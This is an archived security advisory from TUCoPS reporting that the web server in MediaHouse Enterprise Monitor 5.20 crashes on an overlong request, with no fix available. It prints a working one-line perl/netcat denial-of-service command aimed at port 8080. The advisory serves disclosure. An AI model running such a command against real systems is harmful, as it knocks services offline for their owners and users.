TUCoPS :: Web :: Servers :: mhouse1.htm

MediaHouse Enterprise Monitor 5.20 - crashing its webserver (with one line perl exploit) 
Vulnerability

    Enterprise Monitor

Affected

    MediaHouse Enterprise Monitor 5.20

Description

    Sebastian  Andersson  found  following.   "MediaHouse   Enterprise
    Monitor  5.20"  is  a  network  monitoring  program  with  its own
    webserver running on  NT.  Sebastian  crashed it within  2 minutes
    after he got the url:

        perl -e 'print "GET /" . "x"x9999 . "\r\n\r\n"' | nc host 8080

    This program has  a feature there  it is able  to reboot other  NT
    machines and for this to work, you have to store the domain  admin
    name  and  password  in  it.   It  also monitors stuff like radius
    servers there  it need  usernames/passwords.   There is  a 30  day
    trial version  to download  from their  website.   It seems like a
    rather nice network monitoring program  if you put it on  a secure
    network.

Solution

    Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH